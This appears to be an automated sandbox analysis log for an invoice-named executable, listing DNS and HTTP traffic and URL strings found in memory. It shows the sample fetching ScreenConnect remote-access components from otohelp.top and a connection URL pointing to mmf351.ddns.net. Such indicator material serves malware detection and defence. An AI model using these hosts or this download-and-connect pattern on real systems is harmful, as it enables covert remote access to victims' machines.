Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: otohelp.top
Source: global traffic	DNS traffic detected: DNS query: mmf351.ddns.net

Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: dfsvc.exe, 00000001.00000002.2608461337.000001F6D0790000.00000004.00000020.00020000.00000000.sdmp, F2E248BEDDBB2D85122423C41028BFD4.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000005.00000002.2946009989.0000023333061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.2608461337.000001F6D0790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab7
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c097510
Source: dfsvc.exe, 00000001.00000002.2608300536.000001F6D077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: svchost.exe, 00000005.00000003.1709894416.0000023332E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1709894416.0000023332E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1709894416.0000023332E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1709894416.0000023332ECD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.2607771724.000001F6D06F7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B629F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://otohelp.top
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5B3A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1998757686.00000000020DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: E_BILL9926378035.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5F4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5F4E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5FE9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933422520.000000000106D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 00000001.00000002.2604387145.000001F6CFBD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ScreenConnect.Core.dll0.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: svchost.exe, 00000005.00000003.1709894416.0000023332F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1709894416.0000023332F42000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000005.00000003.1709894416.0000023332F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top
Source: dfsvc.exe, 00000001.00000002.2589434562.000001F6B40D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/
Source: dfsvc.exe, 00000001.00000002.2608300536.000001F6D077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bi
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1932966605.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClbhR
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607979675.000001F6D0730000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607771724.000001F6D06F7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607343170.000001F6D069B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1934992392.000000001B71D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1934964833.000000001B710000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933422520.000000000106D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.0000000001010000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, B3D7NWNK.log.1.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
Source: dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application-
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application2
Source: dfsvc.exe, 00000001.00000002.2608083269.000001F6D073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application2m67Np37V
Source: E_BILL9926378035.exe, 00000000.00000002.1842040994.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=
Source: B3D7NWNK.log.1.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&
Source: dfsvc.exe, 00000001.00000002.2608128974.000001F6D0753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationC
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationL
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationX
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationaliz
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1934964833.000000001B710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationppDaq
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933016769.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationpplicati
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1935481684.000000001B7A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationtrue
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationx
Source: dfsvc.exe, 00000001.00000002.2607979675.000001F6D0730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application~
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.dll~
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1933881909.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, B3D7NWNK.log.1.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.2607343170.000001F6D069B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifestR
Source: dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifeston-y
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientSe
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.2606271704.000001F6D010C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.dllF
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2608083269.000001F6D073A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Core.dll$
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Wind
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2608230916.000001F6D0761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstage
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.ex8
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configVK
Source: dfsvc.exe, 00000001.00000002.2602490344.000001F6CE6EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configjK
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsCD
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.ex
